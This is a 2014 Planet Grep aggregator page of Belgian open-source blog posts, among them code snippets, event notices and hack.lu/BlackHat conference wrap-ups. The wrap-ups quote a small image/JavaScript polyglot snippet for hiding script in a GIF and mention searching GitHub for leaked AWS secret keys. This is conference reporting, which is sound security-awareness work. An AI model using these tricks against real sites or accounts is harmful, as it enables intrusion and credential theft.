Subscriptions

Planet Grep is open to all people who either have the Belgian nationality or live in Belgium, and who actively work with or contribute to Open Source/Free software.

About Planet Grep...

Other planets can be found at the Planet Index.

A complete feed is available in a number of syndication formats: RSS 1.0, RSS 2.0, FOAF, and OPML.

The layout of this site was done by Gregory

October 30, 2014

Frank Goossens

Sad Musicians Make Better Music

While waiting for a meeting to begin, I perused the Spotify playlist of a colleague. One of the only names I recognized was Sia.

Aaaah Sia, … How I used to love her. Beautiful songs (both solo and with Zero 7) , wrought with pain, doubt, passion and a splash of quirkiness. Think “Soon we’ll be found” or “Destiny” and above all “Breathe me” (which also featured in the most impressive final of one of the most beautiful and slightly quirky TV shows ever), here in a live version in the KCRW studio’s in 2007;

YouTube Video
Watch this video on YouTube or on Easy Youtube.

But I’m afraid the love affair is over, Sia confessed to being happy now and the song on the Spotify playlist was David Guetta’s rather horrible Titanium which Sia provided vocals for. And recent Sia-tracks like “Chandelier“,  “You’re Never Fully Dressed Without a Smile“, “You’ve changed” or these “7 Songs You Didn’t Know Were Written by Sia” don’t really move me either. I wish Sia all the happiness in the world, but I wish she was still sad. If only a tad.

by frank at October 30, 2014 04:41 PM

Les Jeudis du Libre

Mons, le 20 novembre : Aperçu du développement d’applications Android


Robot AndroidCe jeudi 20 novembre 2014 à 19h se déroulera la 33ème séance montoise des Jeudis du Libre de Belgique.

Le sujet de cette séance : Aperçu du développement d’applications Android

Thématique : Internet|Programmation|Mobile

Public : Développeurs web|programmeurs|étudiants|…

L’animateur conférencier : François Stephany (Ta Mère SCRL)

Lieu de cette séance : HEPH Condorcet, Chemin du Champ de Mars, 15 – 7000 Mons – Auditorium 2 situé au rez de chaussée (cf. ce plan sur le site d’Openstreetmap; ATTENTION, l’entrée est peu visible de la voie principale, elle se trouve dans l’angle formé par un très grand parking).

La participation sera gratuite et ne nécessitera que votre inscription nominative, de préférence préalable, ou à l’entrée de la séance. Merci d’indiquer votre intention en vous inscrivant via la page http://jeudisdulibre.fikket.com/. La séance sera suivie d’un verre de l’amitié.

Les Jeudis du Libre à Mons bénéficient aussi du soutien de nos partenaires : Normation, OpenSides, MeaWeb, NextLab, Phonoid et Creative Monkeys.

Si vous êtes intéressé(e) par ce cycle mensuel, n’hésitez pas à consulter l’agenda et à vous inscrire sur la liste de diffusion afin de recevoir systématiquement les annonces.

Pour rappel, les Jeudis du Libre se veulent des espaces d’échanges autour de thématiques des Logiciels Libres. Les rencontres montoises se déroulent chaque troisième jeudi du mois, et sont organisées dans des locaux et en collaboration avec des Hautes Écoles et Facultés Universitaires du Pôle Hainuyer d’enseignement supérieur impliquées dans les formations d’informaticiens (UMONS, HEH et Condorcet), et avec le concours de l’A.S.B.L. LoLiGrUB, active dans la promotion des logiciels libres.

Description : Nul besoin de présenter Android, il est (presque) partout. Mais que se cache-t-il derrière ce système d’exploitation ? Quelles sont les composantes d’une application Android ? Quelles sont les limites imposées aux développeurs ?

François vous propose de faire un petit tour d’horizon de la plateforme. La présentation sera assez technique; il est donc conseillé d’avoir un minimum d’expérience dans les systèmes informatiques et/ou la programmation pour pouvoir suivre.

by Didier Villers at October 30, 2014 05:54 AM

October 29, 2014

Dries Buytaert

W3C declares HTML5 standard final

After 10 years of development, the W3C has promoted HTML5 to "Recommendation" yesterday: http://www.w3.org/blog/news/archives/4167. W3C's "Recommendation" status is the highest level of maturation, effectively making the markup language a formal standard.

Almost 20% of the world's websites have adopted HTML5, so for many, HTML5 is nothing new.

Drafting the HTML5 standard appears to have been a difficult and tiring process. It took more than 50,000 email exchanges, and the group's bug lists record more than 4,000 errors and ambiguities that had to be resolved.

With HTML5 complete, you might wonder what is next for HTML? Take a look at HTML.next, the list of HTML.next proposed elements and attributes or the list of postponed feature requests.

The trend in development seems to be towards native mobile applications rather than mobile websites, but the future of HTML and its modular design has some interesting things in store. In the long run, I think the line between native applications and web applications will blur. I think the future is better integration and more seamless transitions between the two. Standards are important and can't be here fast enough!

by Dries at October 29, 2014 11:14 AM

October 28, 2014

Kurt Roeckx

DANE

I've been wanting to set up DANE for my domain, but I seem to be unable to find a provider that offers DNSSEC that can also do TLSA records in DNS. I've contacted several companies and most don't even seem to be offering DNSSEC. And if they offer DNSSEC they can't do TLSA records or rfc3597 style "unknown DNS resource record types". I would like to avoid actually running my own nameservers.

So if someone knows someone that can provide that, please contact me at kurt@roeckx.be.

Update [29 October 2014]:
Some people suggested that I set up a hidden master. I actually wanted to avoid that, but I guess I'm going to do that.

October 28, 2014 06:42 PM

October 25, 2014

Mark Van den Borre

Geert Noels over bankenlobby

U zat kort na de crisis in het Lamfalussy-comité dat een blauwdruk moest ontwerpen voor een hervorming van de financiële sector in België. Het eindresultaat was bijzonder vriendelijk. Hebt u die krachten zelf ondergaan?
Noels: ‘Kijk, in dat comité is zes maanden lang ernstig gewerkt. Maar de voorstellen om ‘too big to fail’ en systeemrisico’s aan te pakken, hebben de eindversie van ons rapport niet gehaald. Net zo min als mijn voorstel om een systemische schaal voor banken te ontwikkelen. Het plan was: hoe meer punten een bank scoort op die schaal, hoe hoger het risico voor de gezondheid van het financieel systeem. Op basis daarvan had je spaarders kunnen informeren of waarschuwen, als er tegenover de bovengemiddelde rente op hun spaarboekje ook bovengemiddeld risico schuilging. Een voorbeeld: KBC zou voor de crisis jaar na jaar gestegen zijn op die schaal, nadien jaar na jaar gedaald. En het zou het mogelijk maken om banken op een rechtvaardige manier te belasten. Mijn voorstel is niet gevolgd en vandaag betalen kleine banken proportioneel meer bankenbelasting dan grote. Neen, ik heb daartegen niet luidop geprotesteerd. Onze jurist zegt dat ik daarop beter niet terugkom, maar concludeer zelf maar wat er gebeurd is.’

oorspronkelijk artikel

by Mark Van den Borre (noreply@blogger.com) at October 25, 2014 11:38 AM

October 24, 2014

Wouter Verhelst

Not using adirent

About a month ago, I received an upstream bugreport that the nbd-server wouldn't build on Solaris and its derivatives. This was because nbd-server uses the d_type field of struct dirent, which is widely implemented (in Linux and FreeBSD, at least), but not part of POSIX and therefore not implemented on Solaris (which tends to be more conservative about implementing new features).

The bug reporter pointed towards a blog post by a Solaris user who had written something he calls "adirent", meant to work around the issue by implementing something that would wrap readdir() so that it would inject a stat() call when needed. While that approach works, it seems a bit strange to add a function which wraps readdir to become portable. After all, readdir() does not always return the file type in d_type, not even on systems that do implement it. One example in which this is true is XFS; if one runs readdir() on a directory on an XFS filesystem, then everything will have DT_UNKNOWN as its filetype, indicating that you need to run stat() after all.

As such, I think a better approach is to use that fact so that things will just work on systems where d_type isn't available. The GNU autotools even have a test for it (AC_STRUCT_DIRENT_D_TYPE), which makes things easier. In the case of NBD, I've added that to configure.ac, and then added a touch of preprocessor magic to reuse the infrastructure for dealing with DT_UNKNOWN which is already there:

#ifdef HAVE_STRUCT_DIRENT_D_TYPE
#define NBD_D_TYPE de->d_type
#else
#define NBD_D_TYPE 0
#define DT_UKNOWN 0
#define DT_REG 1
#endif

(...opendir(), readdir(), ...)

switch(NBD_D_TYPE) {
    case DT_UNKNOWN:

(...call stat(), figure out if it is a file...)

    case DT_REG:

(...we know it is a file...)

    default:

(...we know it is not a file...)

this seems cleaner to me than using a wrapper, and has the additional advantage that the DT_UNKNOWN code path could receive some more testing.

October 24, 2014 01:33 PM

Frank Goossens

Music from Our Tube; Wilco’s Impossible Germany

Nothing new, no ground-breaking beats nor exhilarating live Jazz-performances today, but “just” what I feel is an epic rock-song (“Impossible Germany”) written by a great rock-band (Wilco);

YouTube Video
Watch this video on YouTube or on Easy Youtube.

Enjoy your weekend!

by frank at October 24, 2014 12:25 PM

October 23, 2014

Xavier Mertens

Hack.lu 2014 Wrap-Up Day #3

The Internet is broken

The third day is over! After the speaker dinner in a cool place and a very short night, I attended more talks today (no workshops). Let’s go for the daily quick wrap-up…

The first talk was “Internet scanning – conducting research on 0/0” presented by Mark Schloesser from Rapid7 and is also a developer of the Cuckoo sandbox. The topic focused on the IPv4 address space of course. IPv6 could be nice for another talk but has many challenges.

Mark's vision of the Internet

Mark’s vision of the Internet

Mark’s topic was not only the scanning part but also wide data-gathering. Example: when the port 80 is publicly available, the website behind is crawled. People think that scanning the Internet takes time… months? In reality, there are quite performant tools today like masscan or zmap that are able to scan the complete Internet addresses space in less than one hour. Of course, this is theoretical because packets are processed by many routers which can affect the overal performances of the scan. Scanning the Internet is not a new topic and other projects exist for a while like Shodan, the shadowserver foundation, ErrataSec. Of course, Mark said that scanning the Internet is only performed for research purpose (in his case of course). He reviewed some interesting findings:

Mark presented a Rapid7 project called “Sonar” which helps to scan the Internet for specific ports/protocols. Here are some results:

Some recent findings?

To conclude, Mark said that, in such project, the collaboration is key! It is important to make data available to the infosec community. To achive this, a website exists: scans.io. It was a great talk to start the day!

The next talk was presented by Saumil Shah. Do we have to present him? Saumil is a very cool guy who comes always with new crazy ideas and who explains them with simple words and modesty. This time, he came with a talk called “Hacking with pictures“.

Saumil on stage

Saumil on stage

Saumil has been delivering exploits for some years. When you write exploits, the first goal is work below the radar with techniques like:

In 2011, he came with a cool attack called “255 shades of grey” and today it was a new one called “IMAJS” which consists of an image with embeded JavaScript. The concept: The same file can be used twice:

<img src=“image.gif>
<script src=“image.gif”</script>

The evil trick is to use comments to hide the image data:

GIF89A/*xxxxxx*/=0;xxxxxx

The JPEG format is event more powerful thanks to the EXIF data! But the problem is that some caracters must be avoided.Another demo was an exploit using an heap spray attack to pop up, guess what, a calc.exe! This technique was called “Stegosploit” by Saumil and is based on the vulnerability labeleld MS14-035 by Microsoft. The next idea was to have an attack based on some kind of “time machine”. The image is downloaded by the victim at a certain time but the exploitation occurs later. This could have a huge impact in incident response! Conclusions of this talk:

It was really a good presentation, my favourite of today!

After a short break, Paul Rascagnères and Eric Leblond presented “D&D of malware with exotic C&C“. This was a good team: Paul is a respected malware researcher and Eric is a core developer of Suricata, the open source IDS.

Paul & Eric on stage

Paul & Eric on stage

Paul described different cases that he faced while doing malware analysis. How malwares communicate with their C&C servers? Then, Eric explained how to configure Suricata properly to catch the communications (while keeping the performances acceptable).

Conclusion of this talk: even if we have nice tools like dynamic sandox analysiss systems, it’s still very useful to reverse the malware code to understand how the  communicate and write powerful rules! Funny presentation made by two crazy guys!

Then, two presentations were scheduled but I did not follow them: Dominique Bongard spoke about WPS or “WiFi Protected Setup”. After a good description of the WPS working principles (You know the button you have on your router or the sticker on the bottom), Dominique explained the weaknesses of this system.

Warning Sign

Warning Sign

The next one was not a technical talk but a review of the cyberwar between Russia and Ukraine. Glib Pakharenko explained what hapened before and during the war between the two countries. The cyber attacks started before the revolution and they are not only hacking or DDoS. It can also be:

A good example was the one of Russia which hacked SmartTV’s in Ukraine and forced them to show terrorists channels!

The next talk was a presentation of mitmproxy by Maximilian Hils. This proxy plays man-in-the-middle and intercept HTTPS requests. This tools is free and basically allow you to inspect encrypted traffic between the browser and the server but not only! It can also:

The tools is console based and really deserve to be part of your regular toolbox!

mitmproxy demo

mitmproxy demo

And we continued with another talk. This one was called “How I hacked my city” by Amihai Neiderman. This was a walkthough talk. Amihai told us a story. How it begun when I discovered a strange SSID “FREE_TLV” broadcasted on the street. Curious, like many of us, he tried to connect to it and found more and more information.

Amihai on stage

Amihai on stage

He explained step by step like a novel how he successfully compromised the devices behind the wireless network. Starting from test standard passwords, SQL injections, download of the firmware (after being able to identify the vendor product) and how he successfully exploited the firmware.

The next talk focused on exploiting Virtualbox via the 3D acceleration feature. This was called “Breaking out VirtualBox through 3D acceleration” by Francisco Falcon. When I read the abstract of this talk, my first reaction was: “But, how many people use this feature with VirtualBox? Who’s running games on VirtualBox?“. Anyway, Francisco found a great way to abuse this feature!  Note that the VirtualBox developers already warn users in the document: “This code may contain bugs“.

Francisco on stage

Francisco on stage

Before explaining how to exploit the feature, he explained how it works. VirtualBox 3D acceleration is based on Chromium, a library that allow remote rendering of graphics (but nothing related to the browser). The flow of data is the following:

host hardware -> host OS 
                 -> VirtualBox hypervisor (chromium server) 
                    -> Guest OS (vboxguest.sys) 
                       -> OpenGL client

The second part of the talk was dedicated to the detailed explanation of how to exploit this architecture.

My last talk was the one of Garcia Sebastian who presented a nice way to detect botnets activities via the network traffic (“Botnets Behavioral Patterns in the Network“).

Sebastian on stage

Sebastian on stage

The idea behing this talk was based on the following question: How do we detect malwares? We can analyze binary files (the malware itself) or the generated traffic (to exfiltrate data, to communicate with the C&C). The files analysis can be static, dynamic but remains complex. And, it’s the same for the network traffic. What are the performed actions and how they change? An interesting statistics is how we analyse the network traffic?

The next question is: Is it working?

What’s not working?

Sebastian’s idea was to focus on single connections (which is related to a specific action like: a DNS resolution, access to Google, a spam sent). He needed aggregation and created a 4-tuples based on: the source IP, the destination IP, the destination Port and the protocol. Then he explained how the model was created by analysing the behavior of each 4-tuples by extraction 3 features of each flow:

Based on the sizes of the flow, Sebastian explained how to assigned a specific caracter to it (36 states possible). Based on this model, he was able to build a botnet dectection model based on the Markov Chain. A nice research and a nice talk!

I did not attend the last talk. The day finished with the celebration of the CTF winners. The regular conference is now over. Tomorrow, no more regular talks, just a few workshops are still scheduled. Good edition of hack.lu which remains a conference with a specific atmosphere. See you next year for the 11th edition!

Note: the slides are available here.

by Xavier at October 23, 2014 09:37 PM

October 22, 2014

Xavier Mertens

Hack.lu 2014 Wrap-Up Day #2

Security FlawsThe second day is over! I’m just back from a great speaker dinner in Esch s/Alzette. It’s time to write a quick wrap-up. There was again some Cisco forensics workshops on the schedule, that’s why I was not able to attend all today’s talks.

The second day opened with Marion Marshalek‘s keynote called “TS/NOFORM“. This title is derived from the document classification used by the United States. Marion started with an nice introduction based on Starwars characters to finish by a fact: Today, it’s not Starwars anymore but Cyberwars! Cyber means a lot of threats, by example, the control of media, the intellectual property being stolen, nation states spying (and being hacked), the loss of corporate data. Then she explained in details how some malware were tracked. Interesting fact: it’s quite easy to detect the location/nationality of the malware developers by analysing the vocabulary and texts used in the code.

The first regular talk was presented by Claudio Guarnieri. He is a well-known security research mainly know thanks to the Cuckoo project (he’s the leader of this project). His presentation was called “Embrace the Viper and live happy“. Claudio presented his new baby called “Viper“.

Claudio on stage

Claudio on stage

The idea of the tool came from the mess that we are all facing around our files (samples) and tools. What about exploits? They are written using multiple tools and languages and it became unmanageable to keep them properly stored. That’s why HD Moore created the Metasploit framework a few years ago. And what about malware analysis? According to Claudio, it is exactly the same: we have multiple tools, producing multiple output in many formats. They are hard to integrate! “It sucks”. Claudio started a project called VxCage to make filesystems cleaner but it was never finished. Today, Viper is born. It’s a framework  to store and manage samples. It provides an analysis module to inspect your samples and provides an easy way to create new modules. The project is written in Python. Right now, it is just a shell but other user interface could be possible. There is also a REST API. The structure is based on:

Some examples of existing modules are: Radare2, searching for known shell code patterns, analysis of PDF or Office documents, etc… The product is not perfect but works quite well. Claudio makes lot of nice demos. It seems very easy to use with simple and powerfull commands. Claudio said that some modules are incomplete, it lacks of scripting and automation. The product must still be improved but looks great. It is a community project and Claudio is looking for developers/contributors. Viper is available here.

The next talk focused on TR-069, a technical specification called CWMP (“CPE WAN Management Protocol“). It was presented by Shahar Tal. It defines a protocol used for remote management of end-user devices (the Internet box that we all of us have at home) and is based on SOAP/HTTP. Communications are performed between the user’s devices and a central server called ACS (“Auto Configuration Server“).

Shahar on stage

Shahar on stage

Basically, with TR-069, you allow “somebody” to access your device. The question which comes in mind immediately is: who do you trust to run code on your device at any time without approval? The Shahar’s idea was to focus to the ACS instead of the router (which has already been targeted too much!). What is an ACS is compromised? The attacker could:

The first step is to find an ACS! How to achieve this? By compromising a router and checking the traffic or activity. By sniffing your own traffic or by scanning the Internet. Once found, the ACS becomes a regular target and, guess what? Many of them are not properly managed/configured. Shahar reviewed different examples of ACS and how they were compromised. Two examples:

About bad configurations, if SSL is available, according to Shahar, only 15% of them are using SSL to manage their CPE! Interesting talk! If you compromise an ACS, you can potentially own thousands of home routers!

Then, Fyodor Yarochkin, a regular speaker at hack.lu, came to present “Detecting bleeding edge malware: a practical report“. Fyodor is good at presenting research about monitoring malicious activities, malwares and botnets. For him, when you’re compromised, you need to detect properly the who, when, how. The identification of the threat is very important. Fyodor explained how he tracked malicious on-going malware campaigns via DNS and HTTP monitoring. This correlated with public information. As example, he detected an attacker changing its domain name every 3 minutes, impressive!

Fyodor on stage

Fyodor on stage

I just had a quick look to the talk about USB fuzzing. He was presented by Jordan Bouyat. It was very close to the one that I attended at BlackHat last week! To resume briefly, USB fuzzing is interesting because USB ports are available everywhere today! After a short introduction about the USB and its features (bus, detection, etc), Jordan explained the approach his company used to setup an USB fuzzing lab. Based on Qemu, the solution has pro & con:

I expected a lot from the next talk. I was curious about the tool called WiHawk aka the “router vulnerability scanner“. If previously, we saw a talk about TR-069 which focused on ACS servers to pwn home routers, this talk focused again to them. Anamika Singh quickly resumed what is a router and what are its core features: route processing (deciding where to send packets), packets forwarding and special services like filters (ACL) or NAT. She started with a simple example where a password was discovered via an analyse of a router firmware and binwalk. Classic! Then she explained what is the purpose of the WiHawk and described its features. Based on IronWasp (it must be installed on top of it), the framework provides the following checks:

The target can be specified as a single IP address, a network or, more interesting, a Shodan query (GeoIP – city, country, etc). This is an interesting tool but based IronWasp which needs .Net! According to the website, it runs under Linux with wine… To be tested!

Finally, my last talk was the one of Frederik Braun: “We’re struggling to keep up” (a brief history of browser security features). The talk was based on the past, present and future of browsers. Today, “the web is the platform” said Frederik! He showed two screenshots which perfectly resume the history of browsers. The first one is the Yahoo! homepage in the years 2000. The second one is gmail.com with plenty of nice features (fully dynamic web-content). Another fact: browsers are everywhere, event in your car! From the past, we always improved the browser to fix security issues: HTML is  stateless protocol, we invented cookies. We used plain-text communications? We invited HTTPS. It was opt-in? We implemented HSTS. It’s just a whack-a-mole game! Then Frederik review the present issues and the future… Frederik’s conclusion? The browser can aid to secure the website!

The last talk was the same of presented last week at BlackHat: “Evasion of high-end IDPS devices at the IPv6 era” by Enno Rey, Antonios Atlasis, Rafael. Tomorrow, nice talks are scheduled! Stay tuned for more news…

by Xavier at October 22, 2014 10:32 PM

Frank Goossens

Tweaking WordPress’s Expound theme’s menu

I’m helping on a site for a not-for-profit for which we selected “Expound” as the base theme. I like Expound; it looks great, there’s no jQuery- or webfont-cruft to worry about and although the CSS comes with a seperate reset.css-file, it does (Auto-)optimize perfectly.

But I wasn’t happy with the menu color-scheme and with the fact that the menu lacked an indication that a child page of a main entry was being shown instead of the page of that main entry itself (confused much?).

Anyway, this is what I ended up with;
wordpress expound theme menu tweaked

For those wanting to do something similar, this is the relevant CSS in my child theme;

/* don't want no blue */
.navigation-main .current-menu-item > a {
        background: #557B47 !important;
}

/* triangle should not be blue either, need it to be a bit bigger */
.navigation-main ul > .current_page_item a:after, .navigation-main ul > .current-menu-item a:after, .navigation-main ul > .current-post-ancestor a:after, .navigation-main ul > .current-menu-parent a:after, .navigation-main ul > .current-post-parent a:after {
        border-top: 10px solid #557B47 !important;
        bottom: -14px;
        z-index: 1000;
}

@media screen and (min-width: 600px) {
  /* if page from submenu, add line under parent item to show your in that submenu */
  .navigation-main ul > .menu-item {
        border-bottom: 6px solid #3A3A3A !important;
  }
  .navigation-main ul > .current_page_item, .navigation-main ul > .current-menu-item, .navigation-main ul > .current-post-ancestor, .navigation-main ul > .current-menu-parent, .navigation-main ul > .current-post-parent {
        border-bottom: 6px solid #557B47 !important;
  }

  /* but not in submenu */
  .navigation-main .sub-menu > .menu-item {
        border-bottom: 0px !important;
  }

  /* less padding at the bottom to compensate for that extra line */
  .navigation-main a {
        padding: 10px 10px 4px !important;
  }

  /* except when in submenu */
  .navigation-main .sub-menu a {
        padding: 10px !important;;
  }
}

/* change color to default brown if child-item is active */
.navigation-main ul > .current_page_item, .navigation-main ul > .current-menu-item, .navigation-main ul > .current-post-ancestor, .navigation-main ul > .current-menu-ancestor, .navigation-main ul > .current-menu-parent, .navigation-main ul > .current-post-parent {
        background: #3A3A3A !important;
}

Have fun!

by frank at October 22, 2014 03:22 PM

October 21, 2014

Xavier Mertens

Hack.lu 2014 Wrap-Up Day #1

Hack.lu 2014

Hello Dear Readers, my agenda is quite hot at the moment, after attending BlackHat last week in Amsterdam, I’m now in Luxembourg until Friday to attend the 10th edition of Hack.lu. The conference organized in Luxembourg has  already reached a decade! Congratulations to the organizers for the event that I’m attending since 2008! It remained since the beginning in my favorite top-three for the following reasons: nice atmosphere, good sizing (not to big not to small), most visitors are regular ones and allow me to meet them once (or two) times a year.

 As usual, the first day started via a first bunch of workshops. They are very interesting because, compared to regular talks, you’re not passively listening to the speaker but you are doing practical stuff to learn a new tool, protocol. My first choice was to attend a workshop about the ELK stack prepared by Christophe Vandeplas. ELK means “Elasticsearch, Logstash & Kibana” and allows you to collect, parse, store data for further processing. Christophe explained the basic of each components and how to perform forensics investigations based on ELK. I was already using ELK at home to process my logs but, honestly, Christophe gave me some ideas to improve my setup, he has a really good knowledge of this platform. Besides the workshop, he also maintains a Github repository with interesting content to help you in your daily ELK operations. Besides the classic usage which is collecting logs from your infrastructure (firewalls, proxies, servers, …), ELK can also be used to perform pure forensics investigations. Christophe explained how he performs this tasks. The example was given with the analyze of a piece of malware. The complete path is:

  Sandbox -> Pcap file -> Analysis via Suricata with generated EVE events (JSON) -> Logstash

The next workshop was the one of my friend Didier Stevens & myself about Cisco forensics investigations. We gave this workshop for the first time during BruCON and we were invited to provide it in Luxembourg. If you did not attended those conference, don’t forget that we propose an online lab which allow you to perform the exercises proposed during the workshop. Two sessions were organized today and the first one was fully booked.

After the workshop, I joined the main room to attend the last talks of the day. I attended the last minutes of “Bypassing sandboxes for fun… Profit will be realized by sandbox vendors” by Paul Jung. Today vendors are using sandboxes in more and more products and claim that they are the best way to analyse the behaviour of malicious applications. But this remains a “cat & mouse game“. Malware developers have techniques to detect when their code is executed in a sandbox but also how to evade this “secure” environment. I attended only the last 10 mins of the talk which looked very deep and technical.

The next talk was presented by a French guy: Serge Guelton. He presented a research about Python: “Python code obfuscation: improving existing techniques“. Serge explained the different techniques that can be used to obfuscate Python code. For each techniques, he reviewed the pro & con. There can be multiple reasons to do this, a good example is the Dropbox client which is written in Python.

Finally the day ended with a very long presentation by Xeno Kovah about “Extreme privilege escalation on Windows 8 / UEFI systems“. For sure, the word “extreme” was a good choice. Xeno explained that, once a machine has been compromised, we can go further and we expect:

The talk explained deeply how the BIOS of a machine can be accessed from the operating system and also compromised. The day ended with a nice walking dinner with all the attendees and many interesting conversations with peers. I apologize for the lack of coverage of this first day, tomorrow should be more complete! Stay tuned!

Oh, by the way, this year Hack.lu implemented the same kind of wall of sheep like BruCON:

Credits to @Kaweechelchen

Credits to @Kaweechelchen

by Xavier at October 21, 2014 10:31 PM

October 20, 2014

Joram Barrez

My Five Rules for Remote Working

A couple of weeks ago, there was a stir (again) about remote working and its succes and/or failure: it was reported that Reddit, the website where many people lose countless of hours, were forcing all their employees to move to SF. After a similar thing happened at Yahoo last year it made me think about why remote work is such […]

by Joram Barrez at October 20, 2014 08:33 AM

October 17, 2014

Philip Van Hoof

De Fabeltjeskrant

https://www.youtube.com/watch?v=lIWy8taP1rE

Want daarin staat precies vermeld, hoe het met de dieren is gesteld.

by admin at October 17, 2014 11:29 PM

Xavier Mertens

BlackHat Europe 2014 Wrap-Up Day #2

BlackHat Day 2

Yesterday evening, I had a nice dinner with awesome infosec folks. We faced a massive “Deny of Sushi” attack but we survived! So, I’m just back from Amsterdam and here is my small wrap-up for the second BlackHat day.

My first choice was to attend a talk about IPv6. Antonio Atlasis, Enno Rey and Rafael Schaefer presented “Evasion of high-end IDPS devices at the IPv6 era”. They are regular speakers at BlackHat and always present interesting researches. Belgium is facing a massive trend in IPv6 usage since the major telco enabled this protocol for more and more of their residential users. Please don’t think “But I don’t use it in my environment!”. IPv6 is at your door!

IPv6 VS. IDPS

IPv6 VS. IDPS

They started the research by building a lab to play with IPv6 and IDPS and, guess what, they found interesting stuff. They made an introduction about IPv6 extension headers. An IPv6 datagrams looks like a train… A train is composed of wagons. IPv6 packets can have multiple extension headers. They are not vey used today but each IPv6 stack have to support them. Examples of extensions:

There is a recommended order. All should occur at most once. So, how a device should react if this is not the case? Interesting: RFC 7045 says: it SHOULD NOT discard packets contains unrecognised extension headers. What are the common problems that IDS are facing?

  1. Too many things are variable:types, sizes, order and number of occurrences of each one. Also the fields are variable. We can define IPv6 as a function with many parameters: f(v,w,x,y,z).
  2. Fragmentation! Both fragmentable and unfragmentable parts may contain any IPv6 extension headers, this makes the problem number one more complicated to handle.
  3. How extension headers are chained? (using the Next Header field)

Based on these problem, you can now imagine how difficult it is for an IDPS to inspect properly IPv6 packets! What can go wrong? Chiron, an IPv6 penetration testing framework, has been used to test IPv6 extension headers.  They tested fours IPS: 2 open sources and 2 well-known commercial solutions. Each solution was tested agains 12 different evasion techniques. All of them have been reported to the vendors/developers. Some were patched quickly, for others if took longer time and, guest what, others still remain open. To demonstrate this, the speakers performed several live demos:

What could be done? If you are using an IDPS…

Technical mitigations: Implementation of RFC 7112. Configure your devices to drop IPv6 extension headers not used in your network. Sanitize packets before they reach your devices. A very interesting, well prepared with demos working out of the box!

The next talk was chosen purely by curiosity: “Gyrophone – Recognizing speech from gyroscope signals” by Yan Michalevsky, Gabi Nakibly and Dan Boneh.

Gaby & Ivan on stage

Gaby & Ivan on stage

How to record speech without using the built-in microphone? All smart phones have a small device called a gyroscope. To record speech on a mobile device, the main problem for an attacher is how to access the microphone because the access must be approved by the user. But sensors can be freely accessed by apps like… the gyroscope! Why? Because it is not considered as a security or privacy threat. The gyroscope can be accessed from browsers using a simple JavaScript piece of code. They are two major vendors on the market but they both work in the same way. Gyroscopes are very sensible to acoustic noise. To resume: Our voice makes waves which generate vibration. They impact the gyroscope!

Impact of speech against a gyroscope

Impact of speech against a gyroscope

Based on this fact, gyroscopes are (lousy but still) microphones! Sample rate to the gyroscope is limited by the OS (max 200Hz). To give you an idea, a male speech is around 85-180Hz and a woman speech around 165-244Hz. Listening to a map at 200Hz is not efficient but algorithms can be used to perform a deeper analyse for us. That’s what explained the speaker during the rest of the talk. They described the lab they put in place to record enough samples and the different techniques used to:

Depending on the samples and techniques, the results varied  but they also demonstrated how the detection rate could be improved by using multiple devices sampling at the same time. Some other attacks:

What are the defences against this attack? A range of 0-20Hz should be enough for most application to sample the gyroscope. Higher ranges should be allowed only to trusted applications (like the microphone). The idea was very good but, after the theory, I would expect some demos.

After a first coffee break, let’s continue with “Revisiting XSS sanitisation” by Ashar Javed. More precisely, the talk focused on WYSIWYG editors like we can find in thousands of websites such as  forums, CMS (blogs) but also more corporate applications like ticketing systems. They allow you generate nice content by inserting pictures, bold, italic texts, links etc. Froala is a very common editor using my many websites. Imagine a major vulnerability is this editor, you have a very broad surface attack! And developers of such editors are proud to claim they have thousands of customers! Another example if TinyMCE used by WordPress (that I’m using right now to write this post). What to say about XSS? As said Ashar: “They were there, they are and they will be!

Ashar on stage

Ashar on stage

Ashar reviewed some example of XSS vulnerabilities a found in text editors. He received some money from bug bounty programs for this but he was also banned or his account disabled from some sites. Ashar explained step by step in a very didactic way how he successfully abuse so many websites which rely on third party libraries or code. He started with an XSS based on width:expression on IE7 and switched also to other browsers. What are the common injection points in WYSIWYG editors:

Ashar reviewed all of them, always with good examples. He also provided some nice slides which explain how to quickly found XSS using common browsers. The presentation ended with a question: “Why all WYSIWYG editors are vulnerables?”. According to Ashar, the answer is based on two components: Transfert of responsibility and laziness. Developers think that it’s up to the site owner to take care of data received by the client and webmeisters rely on 3rd party code that should block all such kind of attacks.  Finally, some tips were given to efficiently block XSS attacks. To prove this, Ashar started a project and asked people to break into his application. As of today, 82K (!) attacks were executed against the webpage and none succeeded. A last message to developers: if XSS attacks are bad to block, don’t forget to use httpOnly cookies to prevent them of being stolen!

The last half-day started with Erik Peterson who presented “Bringing a machete to the Amazon”.

Erik on stage

Erik on stage

Forget all the *AAS abbreviations! From a single perspective: “Cloud like AWS is an operating system”. It has memory, disk and allows you to run applications. Cloud infrastructure is code. Traditional applications are a small part of the whole system (Java, .Net, etc) and the majority of the system is provided by AWS. And like any application, after a few months, it can become a mess if not properly managed. Forklifting is also dangerous. Forklifting is the process of taking legacy data centre application and loading them into the cloud. This can be expensive and dangerous:

Emergent security: An individual component can be secure but once placed in the cloud, the system becomes insecure. Example: Internet weather – some datacenters can be subject to unpredictable, non-persistent or network latency issues. This is very similar to the DevOps concept. “In the cloud, the king of the jungle is the API”. API keys are the key of your security. Impact?

API can bypass classic security controls: You have an IPS, FW? API can snapshot your VM, mouth snapshot on another VM and extract info. How to get access to API? Via Github of course! Search for “SECRET_ACCESS_KEY“. What about an API honeypot? Your keys will be stolen in less than 60 mins! :) What about cloud metadata? They contain useful info like startup script and AWS access credentials. Not only AWS but all cloud providers have it (except Azure ;-).  There is nothing wrong with metadata … as long as you are aware of them and protect them. Old vulnerabilities, new life thanks to the AWS cloud. Ex: CVE-77 (command injection). Control access to the API and restrict access based on IP but it does not solve the problem! Your bill is not an IDS : “Wow, I got a big bill, something wrong must happen;-) Implement API logging, by default it’s off! Turn on CloudTrail and use Logstash (as example).  DevOps culture tends to “fail open”. Developers are new to the cloud. Their goal is “just to make it work”.  Leaking taks! Tags are very nice to keep information (ex: owner of the machine, contacts, …) but please don’t put your password or API key inside tags! Back to the title of the presentation: Machete is a tool to:

Other tools that could be interesting:

Very nice presentation but the introduction to AWS cloud and the associated risks was a bit long (IMHO). I’d expect some nice demos of Erik’s tool.

The next presentation was dedicated to the new OS X version. Version 10.10 called “Yosemite”. Good synchronisation, it was just released yesterday. This versions was already available to developers (and security researchers). It was reviewed, from a security point of view by Ming-chieh Pan and Sung-ting Tsai

Sung-ting & Ming-chieh on stage

Sung-ting & Ming-chieh on stage

